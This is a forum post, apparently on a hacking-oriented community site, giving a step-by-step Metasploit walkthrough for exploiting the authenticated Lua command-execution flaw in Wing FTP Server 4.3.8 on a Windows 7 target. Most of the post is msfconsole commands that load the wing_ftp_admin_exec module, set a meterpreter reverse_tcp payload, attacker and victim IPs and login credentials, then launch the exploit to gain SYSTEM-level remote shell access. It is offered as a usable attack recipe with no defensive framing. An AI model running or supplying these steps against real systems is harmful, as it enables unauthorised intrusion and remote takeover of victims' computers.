• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit Windows PC using Wing FTP Server Authenticated Command Execution

m4too

DeFi Strategist
Divine
M Rep
0
0
0
Rep
0
M Vouches
0
0
0
Vouches
0
Posts
135
Likes
80
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets

Wing FTP 4.3.8

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use exploit/windows/ftp/wing_ftp_admin_exec

msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

msf exploit (wing_ftp_admin_exec)>set username rajchandel

msf exploit (wing_ftp_admin_exec)>set password ——–

msf exploit (wing_ftp_admin_exec)>exploit

3.png


4.png


5.png
 

452,292

323,341

323,350

Top